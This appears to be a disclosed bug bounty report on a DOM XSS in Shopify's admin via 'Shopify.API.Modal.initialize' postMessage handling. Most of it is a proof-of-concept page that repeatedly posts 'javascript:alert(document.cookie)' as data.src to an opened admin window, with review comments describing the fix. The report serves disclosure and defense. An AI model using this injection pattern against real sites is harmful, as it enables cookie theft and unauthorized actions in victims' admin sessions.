DOM XSS via Shopify.API.Modal.initialize
Discovered by tems on Shopify

This issue took 0 Days and 13 hours to triage and 11 Days and 0 hours to resolve once triaged.



Similar to reports #422043 and #576532.

Payload (based on #576532):

<!--
  Proof of concept from the report. It opens the store admin in a new window and
  posts "Shopify.API.Modal.initialize" messages to it whose data.src is a
  javascript: URL.
  NOTE(review): the receiving handler is not shown on this page. From the report
  title it presumably uses data.src without restricting its scheme; confirm
  against the handler. The fix belongs on the receiving side: check event.origin
  against the expected senders, and accept only http(s) URLs for src.
-->
<script>
    // Opens the admin themes page and sends it modal-initialize messages every 500 ms.
    function attack(){
        // Keep a handle to the opened window; it is the postMessage target below.
        const ctx = window.open(location.origin+'/admin/themes', '_blank')
        // Message envelope: "message" names the handler, "data.src" is the value under test.
        const json = {
            message: "Shopify.API.Modal.initialize",
            data: {
                src: ""
            }
        }

        let interval;
        // Re-send every 500 ms. window.attackSuccess is not set anywhere in this
        // listing, so as shown the timer is never cleared by this code.
        interval = setInterval(function(){
            if (window.attackSuccess) {
                clearInterval(interval)
            } else {
                // The message is sent as a JSON string, and no targetOrigin argument is passed.
                // src is "" only on the first tick; afterwards it keeps the value assigned below.
                // The page does not explain the empty-src message (the payload is based on #576532).
                ctx.postMessage(JSON.stringify(json)) // data.src == ""
                // A javascript: URL in src is the input the handler should reject;
                // alert(document.cookie) is only a visible marker that script ran.
                json.data.src = "javascript:alert(document.cookie)"
                ctx.postMessage(JSON.stringify(json))
            }
        }, 500)
    }
    // Runs once as soon as the script is parsed.
    attack()
</script>
<!-- Clicking the link calls attack() again, in addition to the call made when the script loaded. -->
<a href="javascript:attack()" style="display:block;text-align:center;width:100%;height:300px;line-height:300px;background:#000;color:#fff;">click me start attack</a>

Impact

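An attacker could perform unauthorized actions in a store admin, on any embedded app, because the `javascript:` URL supplied in `data.src` is executed in the context of the admin page.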